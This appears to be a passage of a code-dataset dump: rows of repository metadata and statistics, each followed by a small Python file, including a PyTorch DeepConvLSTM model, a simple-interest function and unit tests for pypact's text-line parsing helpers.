""" | 9,148.847222 | 367,501 | 0.961108 | 24,674 | 658,717 | 25.641282 | 0.757842 | 0.001652 | 0.002102 | 0.002403 | 0.051821 | 0.051722 | 0.050524 | 0.046972 | 0.04652 | 0.04652 | 0 | 0.15665 | 0.000457 | 658,717 | 72 | 367,502 | 9,148.847222 | 0.804251 | 0.000826 | 0 | 0 | 1 | 0 | 0.37196 | 0.11731 | 0 | 1 | 0 | 0.013889 | 0 | 0 | null | null | 0 | 0.230769 | null | null | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f3ef3d1900bef2841c0338c503df0f8bd4ea8e99 | 5,167 | py | Python | models.py | sushitea/time_series_sensor_DL | ea65182a95a4ca52b2d26acf32442d406edfb7da | [
"MIT"
] | null | null | null | models.py | sushitea/time_series_sensor_DL | ea65182a95a4ca52b2d26acf32442d406edfb7da | [
"MIT"
] | null | null | null | models.py | sushitea/time_series_sensor_DL | ea65182a95a4ca52b2d26acf32442d406edfb7da | [
"MIT"
] | null | null | null | import torch
from torch import nn
class DeepConvLSTM(nn.Module):
def __init__(self, n_channels, len_seq=24, n_hidden=128, n_layers=2, n_filters=64,
n_classes=18, filter_size=5, pool_filter_size=3, dropout_probability=0.5):
super(DeepConvLSTM, self).__init__() # Call init function for nn.Module whenever this function is called
self.n_channels = n_channels
self.dropout_probability = dropout_probability # Dropout probability
self.len_seq = len_seq
self.n_layers = n_layers # Number of layers in the lstm network
self.n_hidden = n_hidden # number of hidden units per layer in the lstm
self.n_filters = n_filters # number of convolutional filters per layer
self.n_classes = n_classes # number of target classes
self.filter_size = filter_size # convolutional filter size
self.pool_filter_size = pool_filter_size # max pool filter size if using
self.convlayer = nn.Sequential(
nn.Conv1d(n_channels, n_filters, (filter_size)),
nn.Conv1d(n_filters, n_filters, (filter_size)),
nn.Conv1d(n_filters, n_filters, (filter_size)),
nn.Conv1d(n_filters, n_filters, (filter_size))
)
self.lstm = nn.LSTM(n_filters, n_hidden, n_layers, batch_first=True)
self.dropout = nn.Dropout(p=dropout_probability)
self.predictor = nn.Linear(n_hidden,n_classes)
def forward(self, x, hidden, batch_size):
x = x.view(-1, self.n_channels, self.len_seq)
x = self.convlayer(x)
x = x.view(batch_size, -1, self.n_filters)
x,hidden = self.lstm(x, hidden)
x = self.dropout(x)
x = x.view(batch_size, -1, self.n_hidden)[:,-1,:]
out = self.predictor(x)
return out, hidden
def init_hidden(self, batch_size):
weight = next(self.parameters()).data # return a Tensor from self.parameters to use as a base for the initial hidden state.
## Generate new tensors of zeros with similar type to weight, but different size.
if (torch.cuda.is_available()):
hidden = (weight.new_zeros(self.n_layers, batch_size, self.n_hidden).cuda(), # Hidden state
weight.new_zeros(self.n_layers, batch_size, self.n_hidden).cuda()) # Cell state
else:
hidden = (weight.new_zeros(self.n_layers, batch_size, self.n_hidden),
weight.new_zeros(self.n_layers, batch_size, self.n_hidden))
return hidden
class DeepConvLSTM_mod(nn.Module):
def __init__(self, n_channels, len_seq=24, n_hidden = 128, n_layers = 2, n_filters = 64,
n_classes = 2, filter_size = 5,pool_filter_size=3, dropout_probability = 0.5):
super(DeepConvLSTM_mod, self).__init__() # Call init function for nn.Module whenever this function is called
self.n_channels = n_channels
self.dropout_probability = dropout_probability # Dropout probability
self.len_seq = len_seq
self.n_layers = n_layers # Number of layers in the lstm network
self.n_hidden = n_hidden # number of hidden units per layer in the lstm
self.n_filters = n_filters # number of convolutional filters per layer
self.n_classes = n_classes # number of target classes
self.filter_size = filter_size # convolutional filter size
self.pool_filter_size = pool_filter_size # max pool filter size if using
# Convolutional net
self.convlayer = nn.Sequential(
nn.Conv1d(n_channels, n_filters, (filter_size)),
nn.Conv1d(n_filters, n_filters, (filter_size)),
nn.Conv1d(n_filters, n_filters, (filter_size)),
nn.Conv1d(n_filters, n_filters, (filter_size))
)
# LSTM layers
self.lstm = nn.LSTM(n_filters, n_hidden, n_layers, batch_first=True)
# Dropout layer
self.dropout = nn.Dropout(p=dropout_probability)
# Output layer
self.predictor = nn.Linear(n_hidden,n_classes)
def forward(self, x, hidden, batch_size):
#Reshape x if necessary to add the 2nd dimension
x = x.view(-1, self.n_channels, self.len_seq)
x = self.convlayer(x)
x = x.view(batch_size, -1, self.n_filters)
x, hidden = self.lstm(x, hidden)
x = self.dropout(x)
x = x.view(batch_size, -1, self.n_hidden)[:,-1,:]
out = self.predictor(x)
return out, hidden
def init_hidden(self, batch_size):
weight = next(self.parameters()).data # return a Tensor from self.parameters to use as a base for the initial hidden state.
## Generate new tensors of zeros with similar type to weight, but different size.
if (torch.cuda.is_available()):
hidden = (weight.new_zeros(self.n_layers, batch_size, self.n_hidden).cuda(), # Hidden state
weight.new_zeros(self.n_layers, batch_size, self.n_hidden).cuda()) # Cell state
else:
hidden = (weight.new_zeros(self.n_layers, batch_size, self.n_hidden),
weight.new_zeros(self.n_layers, batch_size, self.n_hidden))
return hidden | 47.842593 | 131 | 0.653184 | 735 | 5,167 | 4.363265 | 0.137415 | 0.053009 | 0.04116 | 0.039913 | 0.950421 | 0.950421 | 0.950421 | 0.926099 | 0.926099 | 0.926099 | 0 | 0.011387 | 0.252177 | 5,167 | 108 | 132 | 47.842593 | 0.818582 | 0.204955 | 0 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0 | 0.02439 | 0 | 0.170732 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f3f4c91869746520ec8bb76b607c63e9c5901ae8 | 67 | py | Python | toolkit/routes/serp/__init__.py | salonimalhotra-ui/seo-audits-toolkit | 99af8b53dffad45f679eaf06b4a8080df75fcd72 | [
"MIT"
] | 1 | 2020-12-21T18:21:34.000Z | 2020-12-21T18:21:34.000Z | toolkit/routes/serp/__init__.py | x0rzkov/seo-audits-toolkit | 29994cbab51bd0697c717b675df3c176096e4f03 | [
"MIT"
] | null | null | null | toolkit/routes/serp/__init__.py | x0rzkov/seo-audits-toolkit | 29994cbab51bd0697c717b675df3c176096e4f03 | [
"MIT"
] | null | null | null | import toolkit.routes.serp.api
import toolkit.routes.serp.dashboard | 33.5 | 36 | 0.865672 | 10 | 67 | 5.8 | 0.6 | 0.448276 | 0.655172 | 0.793103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044776 | 67 | 2 | 36 | 33.5 | 0.90625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
f3fdf6972ddfa7a4da895550c7d26e6df45f7872 | 164 | py | Python | 01-first-python-project/simple_interest.py | mkumar-552/learn-programming-with-python- | cb0aa11c741019959ce3db84552a7e012486092e | [
"MIT"
] | 64 | 2018-05-25T01:26:31.000Z | 2022-03-03T20:42:20.000Z | 01-first-python-project/simple_interest.py | mkumar-552/learn-programming-with-python- | cb0aa11c741019959ce3db84552a7e012486092e | [
"MIT"
] | null | null | null | 01-first-python-project/simple_interest.py | mkumar-552/learn-programming-with-python- | cb0aa11c741019959ce3db84552a7e012486092e | [
"MIT"
] | 72 | 2018-05-24T15:04:46.000Z | 2022-03-08T04:19:18.000Z | def calculate_simple_interest(principal, interest, duration) :
return principal * (1 + interest * 0.01 * duration)
print(calculate_simple_interest(10000,5,5))
| 32.8 | 62 | 0.762195 | 21 | 164 | 5.761905 | 0.619048 | 0.247934 | 0.380165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 0.128049 | 164 | 4 | 63 | 41 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 0.666667 | 0.333333 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
6d1095cba3809be4bb83b071d6143ffe5ae8787a | 151 | py | Python | examples/pipeline/app.py | SuperCarers/simple-settings | e46d148fc1fbf3b65ef354b4eec57074f590aa7d | [
"MIT"
] | null | null | null | examples/pipeline/app.py | SuperCarers/simple-settings | e46d148fc1fbf3b65ef354b4eec57074f590aa7d | [
"MIT"
] | 1 | 2018-03-28T14:43:01.000Z | 2018-03-28T14:43:01.000Z | examples/pipeline/app.py | jakul/simple-settings | 936df02049d2323ace0d0d42bcf467c299b09c71 | [
"MIT"
] | 1 | 2021-01-06T03:59:29.000Z | 2021-01-06T03:59:29.000Z | # -*- coding: utf-8 -*-
from simple_settings import settings
print(settings.ONLY_IN_FIRST)
print(settings.ONLY_IN_SECOND)
print(settings.SIMPLE_CONF)
| 21.571429 | 36 | 0.794702 | 22 | 151 | 5.181818 | 0.590909 | 0.342105 | 0.298246 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007246 | 0.086093 | 151 | 6 | 37 | 25.166667 | 0.818841 | 0.139073 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.25 | 0 | 0.25 | 0.75 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
6d188c9e41920cda106822e6e1adf1957b8e6a2e | 19,316 | py | Python | tests/util/linestest.py | zxkjack123/pypact | 8b37f42007e0accabc9fb31d4ab76935b559d817 | [
"Apache-2.0"
] | 18 | 2018-01-22T14:00:18.000Z | 2022-03-08T06:29:22.000Z | tests/util/linestest.py | listato/pypact | a418ba218cdf4a25ae3e7d72e0919905d027d2ba | [
"Apache-2.0"
] | 28 | 2018-12-07T14:30:46.000Z | 2022-02-27T20:33:06.000Z | tests/util/linestest.py | listato/pypact | a418ba218cdf4a25ae3e7d72e0919905d027d2ba | [
"Apache-2.0"
] | 8 | 2018-05-29T13:41:59.000Z | 2021-01-21T01:33:41.000Z | import os
from tests.testerbase import Tester, REFERENCE_DIR
import pypact.util.lines as lines
from pypact.util.file import content_as_str
class LinesUnitTest(Tester):
def setUp(self):
self.base_dir = os.path.join(REFERENCE_DIR)
self.filename_test91out = os.path.join(self.base_dir, "test91.out")
self.file_as_string = content_as_str(self.filename_test91out)
# DO NOT CHANGE THIS TEXT. IT IS USED FOR TESTING
self.teststr = """This is a line.
This is another line after a space
Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)
Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)
blah blah 6 4 dajsl 2.3
HEADER
you see it here
and here 4.615 * & 5.02e-4 tag 0.472e-8 ^55 fdjl
HEADER
you see it here
and here 14.65 * & 5.032e-4 tag 0.4342e-3 ^545 fdjddl
HEADER2
you seedhfsdjkl it here
and here 44.65 * & 52.02e-4 tag 0.342e-4 ^55 fdjl fds
""".splitlines()
def test_line_indices(self):
self.assertEqual(lines.line_indices(self.teststr, 'This'), [0, 2])
self.assertEqual(lines.line_indices(self.teststr, 'another'), [2])
self.assertEqual(lines.line_indices(self.teststr, 'This is a line'), [0])
self.assertEqual(lines.line_indices(self.teststr, 'This is a lines'), [])
self.assertEqual(lines.line_indices(self.teststr, 'This is another line after a space'), [])
self.assertEqual(lines.line_indices(self.teststr, 'This is another line after a space'), [2])
self.assertEqual(lines.line_indices(self.teststr, 'blah'), [8])
self.assertEqual(lines.line_indices(self.teststr, 'blah blah'), [8])
self.assertEqual(lines.line_indices(self.teststr, '6'), [6, 8, 14, 20, 26])
self.assertEqual(lines.line_indices(self.teststr, '3'), [3, 6, 8, 20, 26])
self.assertEqual(lines.line_indices(self.teststr, '738.9'), [3])
self.assertEqual(lines.line_indices(self.teststr, '(738.9)'), [3])
self.assertEqual(lines.line_indices(self.teststr, ' (738.9)'), [3])
self.assertEqual(lines.line_indices(self.teststr, ' (738.9)'), [3])
self.assertEqual(lines.line_indices(self.teststr, ' (738.9) '), [])
self.assertEqual(lines.line_indices(self.teststr, '!'), [6])
self.assertEqual(lines.line_indices(self.teststr, ' !'), [6])
self.assertEqual(lines.line_indices(self.teststr, ' !and'), [6])
self.assertEqual(lines.line_indices(self.teststr, ' ! '), [])
self.assertEqual(lines.line_indices(self.teststr, ' some text '), [])
self.assertEqual(lines.line_indices(self.teststr, ' some text. '), [3, 6])
self.assertEqual(lines.line_indices(self.teststr, 'HEADER'), [10, 16, 22])
self.assertEqual(lines.line_indices(self.teststr, 'HEADER2'), [22])
self.assertEqual(lines.line_indices(self.teststr, ' '), [0,2,3,6,8,10,12,14,16,18,20,22,24,26,27])
self.assertEqual(lines.line_indices(self.teststr, '\n'), [])
def test_string_from_line(self):
self.assertEqual(
lines.strings_from_line(self.teststr[0], 'This'), ['is', 'a', 'line.'])
self.assertEqual(
lines.strings_from_line(self.teststr[0], 'is'), ['is', 'a', 'line.'])
self.assertEqual(
lines.strings_from_line(self.teststr[0], 'a'), ['line.'])
self.assertEqual(
lines.strings_from_line(self.teststr[1], 'This'), [])
self.assertEqual(
lines.strings_from_line(self.teststr[2], 'This'), ['is', 'another', 'line', 'after', 'a', 'space'])
self.assertEqual(
lines.strings_from_line(self.teststr[3], 'This'), [])
self.assertEqual(
lines.strings_from_line(self.teststr[16], 'HEADER'), [])
self.assertEqual(
lines.strings_from_line(self.teststr[22], 'HEADER'), ['2'])
self.assertEqual(
lines.strings_from_line(self.teststr[22], 'HEADER2'), [])
self.assertEqual(
lines.strings_from_line(self.teststr[26], 'tag'), ['0.342e-4', '^55', 'fdjl', 'fds'])
self.assertEqual(
lines.strings_from_line(self.teststr[26], 'tag', ignoretags=['^']), ['0.342e-4', '^55', 'fdjl', 'fds'])
self.assertEqual(
lines.strings_from_line(self.teststr[26], 'tag', ignoretags=['^55']), ['0.342e-4', 'fdjl', 'fds'])
self.assertEqual(
lines.strings_from_line(self.teststr[26], 'tag', ignoretags=['^55', 'djl']), ['0.342e-4', 'fdjl', 'fds'])
self.assertEqual(
lines.strings_from_line(self.teststr[26], 'tag', ignoretags=['^55', 'fdjl']), ['0.342e-4', 'fds'])
self.assertEqual(lines.strings_from_line(self.file_as_string[83], 'TOTAL ACTIVITY EXCLUDING TRITIUM'),
['1.45396E+07', 'Bq'])
def test_join_strings_from_line(self):
self.assertEqual(
lines.join_strings_from_line(self.teststr[0], 'This'), 'is a line.')
self.assertEqual(
lines.join_strings_from_line(self.teststr[0], 'is'), 'is a line.')
self.assertEqual(
lines.join_strings_from_line(self.teststr[0], 'a'), 'line.')
self.assertEqual(
lines.join_strings_from_line(self.teststr[1], 'This'), '')
self.assertEqual(
lines.join_strings_from_line(self.teststr[2], 'This'), 'is another line after a space')
self.assertEqual(
lines.join_strings_from_line(self.teststr[2], 'This', endtag='a space'), 'is another line after a space')
self.assertEqual(
lines.join_strings_from_line(self.teststr[2], 'This', endtag='space'), 'is another line after a')
self.assertEqual(
lines.join_strings_from_line(self.teststr[2], 'This', endtag='another'), 'is')
self.assertEqual(
lines.join_strings_from_line(self.teststr[3], 'This'), '')
self.assertEqual(
lines.join_strings_from_line(self.teststr[16], 'HEADER'), '')
self.assertEqual(
lines.join_strings_from_line(self.teststr[22], 'HEADER'), '2')
self.assertEqual(
lines.join_strings_from_line(self.teststr[22], 'HEADER2'), '')
self.assertEqual(
lines.join_strings_from_line(self.teststr[26], 'tag'), '0.342e-4 ^55 fdjl fds')
self.assertEqual(
lines.join_strings_from_line(self.teststr[26], 'tag', ignoretags=['^']), '0.342e-4 ^55 fdjl fds')
self.assertEqual(
lines.join_strings_from_line(self.teststr[26], 'tag', ignoretags=['^55']), '0.342e-4 fdjl fds')
self.assertEqual(
lines.join_strings_from_line(self.teststr[26], 'tag', ignoretags=['^55', 'djl']), '0.342e-4 fdjl fds')
self.assertEqual(
lines.join_strings_from_line(self.teststr[26], 'tag', ignoretags=['^55', 'fdjl']), '0.342e-4 fds')
self.assertEqual(
lines.join_strings_from_line(self.teststr[26], 'tag', ignoretags=['^55', 'fdjl'], endtag='fds'), '0.342e-4')
def test_first_value_from_line(self):
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[0], 'This')))
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[0], 'is')))
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[0], 'a')))
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[1], 'This')))
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[2], 'This')))
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[3], 'This')))
self.assertEqual(
lines.first_value_from_line(self.teststr[6], 'Here'), 783.4)
self.assertEqual(
lines.first_value_from_line(self.teststr[6], '**'), 3248.93e7)
self.assertEqual(
lines.first_value_from_line(self.teststr[6], '** *'), 3248.93e7)
self.assertEqual(
lines.first_value_from_line(self.teststr[6], '*'), 3248.93e7)
self.assertEqual(
lines.first_value_from_line(self.teststr[6], ' *'), 3248.93e7)
self.assertEqual(
lines.first_value_from_line(self.teststr[6], ' *', ignoretags=['3248.93e7']), -10.83324e+3)
self.assertEqual(
lines.first_value_from_line(self.teststr[6], '3248.93e7'), -10.83324e+3)
self.assertEqual(
lines.first_value_from_line(self.teststr[6], '!'), -10.83324e+3)
self.assertEqual(
lines.first_value_from_line(self.teststr[6], '!and'), -10.83324e+3)
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[16], 'HEADER')))
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[22], 'HEADER2')))
self.assertEqual(
lines.first_value_from_line(self.teststr[22], 'HEADER'), 2)
self.assertEqual(
lines.first_value_from_line(self.teststr[26], 'tag'), 0.342e-4)
self.assertEqual(
lines.first_value_from_line(self.teststr[26], 'tag', ignoretags=['^']), 0.342e-4)
self.assertEqual(
lines.first_value_from_line(self.teststr[26], 'tag', ignoretags=['^55']), 0.342e-4)
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[26], 'tag', ignoretags=['0.342e-4', '^55', 'djl'])))
self.assertEqual(
lines.first_value_from_line(self.teststr[26], 'tag', ignoretags=['^55', 'fdjl']), 0.342e-4)
def test_first_occurrence(self):
notfound = (-1, '')
self.assertEqual(lines.first_occurrence(self.teststr, 'This'),
(0, 'This is a line.'))
self.assertEqual(lines.first_occurrence(self.teststr, 'another'),
(2, 'This is another line after a space'))
self.assertEqual(lines.first_occurrence(self.teststr, 'This is a line'),
(0, 'This is a line.'))
self.assertEqual(lines.first_occurrence(self.teststr, 'This is a lines'),
notfound)
self.assertEqual(lines.first_occurrence(self.teststr, 'This is another line after a space'),
notfound)
self.assertEqual(lines.first_occurrence(self.teststr, 'This is another line after a space'),
(2, 'This is another line after a space'))
self.assertEqual(lines.first_occurrence(self.teststr, 'blah'),
(8, 'blah blah 6 4 dajsl 2.3'))
self.assertEqual(lines.first_occurrence(self.teststr, 'blah blah'),
(8, 'blah blah 6 4 dajsl 2.3'))
self.assertEqual(lines.first_occurrence(self.teststr, '6'),
(6, 'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
self.assertEqual(lines.first_occurrence(self.teststr, '3'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.first_occurrence(self.teststr, '738.9'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.first_occurrence(self.teststr, '(738.9)'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.first_occurrence(self.teststr, ' (738.9)'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.first_occurrence(self.teststr, ' (738.9)'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.first_occurrence(self.teststr, ' (738.9) '),
notfound)
self.assertEqual(lines.first_occurrence(self.teststr, '!'),
(6, 'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
self.assertEqual(lines.first_occurrence(self.teststr, ' !'),
(6, 'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
self.assertEqual(lines.first_occurrence(self.teststr, ' !and'),
(6,'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
self.assertEqual(lines.first_occurrence(self.teststr, ' ! '),
notfound)
self.assertEqual(lines.first_occurrence(self.teststr, ' some text '),
notfound)
self.assertEqual(lines.first_occurrence(self.teststr, ' some text. '),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.first_occurrence(self.teststr, 'HEADER'),
(10, 'HEADER'))
self.assertEqual(lines.first_occurrence(self.teststr, 'HEADER2'),
(22, 'HEADER2'))
self.assertEqual(lines.first_occurrence(self.teststr, ' '),
(0, 'This is a line.'))
self.assertEqual(lines.first_occurrence(self.teststr, '\n'),
notfound)
self.assertEqual(lines.first_occurrence(self.file_as_string, 'TOTAL ACTIVITY EXCLUDING TRITIUM'),
(83, 'TOTAL ACTIVITY EXCLUDING TRITIUM 1.45396E+07 Bq'))
def test_last_occurrence(self):
notfound = (-1, '')
self.assertEqual(lines.last_occurrence(self.teststr, 'This'),
(2, 'This is another line after a space'))
self.assertEqual(lines.last_occurrence(self.teststr, 'another'),
(2, 'This is another line after a space'))
self.assertEqual(lines.last_occurrence(self.teststr, 'This is a line'),
(0, 'This is a line.'))
self.assertEqual(lines.last_occurrence(self.teststr, 'This is a lines'),
notfound)
self.assertEqual(lines.last_occurrence(self.teststr, 'This is another line after a space'),
notfound)
self.assertEqual(lines.last_occurrence(self.teststr, 'This is another line after a space'),
(2, 'This is another line after a space'))
self.assertEqual(lines.last_occurrence(self.teststr, 'blah'),
(8, 'blah blah 6 4 dajsl 2.3'))
self.assertEqual(lines.last_occurrence(self.teststr, 'blah blah'),
(8, 'blah blah 6 4 dajsl 2.3'))
self.assertEqual(lines.last_occurrence(self.teststr, '6'),
(26, 'and here 44.65 * & 52.02e-4 tag 0.342e-4 ^55 fdjl fds'))
self.assertEqual(lines.last_occurrence(self.teststr, '3'),
(26, 'and here 44.65 * & 52.02e-4 tag 0.342e-4 ^55 fdjl fds'))
self.assertEqual(lines.last_occurrence(self.teststr, '738.9'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.last_occurrence(self.teststr, '(738.9)'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.last_occurrence(self.teststr, ' (738.9)'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.last_occurrence(self.teststr, ' (738.9)'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.last_occurrence(self.teststr, ' (738.9) '),
notfound)
self.assertEqual(lines.last_occurrence(self.teststr, '!'),
(6,
'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
self.assertEqual(lines.last_occurrence(self.teststr, ' !'),
(6,
'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
self.assertEqual(lines.last_occurrence(self.teststr, ' !and'),
(6,
'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
self.assertEqual(lines.last_occurrence(self.teststr, ' ! '),
notfound)
self.assertEqual(lines.last_occurrence(self.teststr, ' some text '),
notfound)
self.assertEqual(lines.last_occurrence(self.teststr, ' some text. '),
(6, 'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
self.assertEqual(lines.last_occurrence(self.teststr, 'HEADER'),
(22, 'HEADER2'))
self.assertEqual(lines.last_occurrence(self.teststr, 'HEADER2'),
(22, 'HEADER2'))
self.assertEqual(lines.last_occurrence(self.teststr, ' '),
(27, ''))
self.assertEqual(lines.last_occurrence(self.teststr, '\n'),
notfound)
def test_next_occurrence(self):
notfound = (-1, '')
self.assertEqual(lines.next_occurrence(self.teststr, 'HEADER', 10),
(10, 'HEADER'))
self.assertEqual(lines.next_occurrence(self.teststr, 'HEADER', 11),
(16, 'HEADER'))
self.assertEqual(lines.next_occurrence(self.teststr, 'HEADER', 16),
(16, 'HEADER'))
self.assertEqual(lines.next_occurrence(self.teststr, 'HEADER', 17),
(22, 'HEADER2'))
self.assertEqual(lines.next_occurrence(self.teststr, 'HEADER', 22),
(22, 'HEADER2'))
self.assertEqual(lines.next_occurrence(self.teststr, 'HEADER2', 22),
(22, 'HEADER2'))
self.assertEqual(lines.next_occurrence(self.teststr, 'HEADER2', 0),
(22, 'HEADER2'))
self.assertEqual(lines.next_occurrence(self.teststr, 'HEADER2', 23),
notfound)
self.assertEqual(lines.next_occurrence(self.teststr, '3'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.next_occurrence(self.teststr, '3', 1),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.next_occurrence(self.teststr, '3', 3),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.next_occurrence(self.teststr, '3', 4),
(6, 'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
| 58.711246 | 130 | 0.587596 | 2,436 | 19,316 | 4.542282 | 0.052545 | 0.14216 | 0.244013 | 0.094442 | 0.941347 | 0.935653 | 0.92535 | 0.893538 | 0.849435 | 0.790239 | 0 | 0.078752 | 0.261752 | 19,316 | 328 | 131 | 58.890244 | 0.697195 | 0.002433 | 0 | 0.503333 | 0 | 0.096667 | 0.230186 | 0 | 0 | 0 | 0 | 0 | 0.48 | 1 | 0.026667 | false | 0 | 0.013333 | 0 | 0.043333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6d522cd09b0b652b5767872b2ae8b5943d8dfa13 | 187 | py | Python | ml_gym/metrics/__init__.py | olliethomas/ml-fairness-gym | adaa878596d3ce7dc0ee821f53f99cdf0cd2ef5f | [
"Apache-2.0"
] | null | null | null | ml_gym/metrics/__init__.py | olliethomas/ml-fairness-gym | adaa878596d3ce7dc0ee821f53f99cdf0cd2ef5f | [
"Apache-2.0"
] | null | null | null | ml_gym/metrics/__init__.py | olliethomas/ml-fairness-gym | adaa878596d3ce7dc0ee821f53f99cdf0cd2ef5f | [
"Apache-2.0"
] | null | null | null | from .distribution_comparison_metrics import *
from .error_metrics import *
from .infectious_disease_metrics import *
from .lending_metrics import *
from .value_tracking_metrics import *
| 31.166667 | 46 | 0.839572 | 23 | 187 | 6.478261 | 0.478261 | 0.436242 | 0.456376 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106952 | 187 | 5 | 47 | 37.4 | 0.892216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ed93475a415670577593dc5509cef455062c96ff | 68,608 | py | Python | benchmarks/SimResults/combinations_spec_ml/cmp_astarlbmtontoh264ref/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_ml/cmp_astarlbmtontoh264ref/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
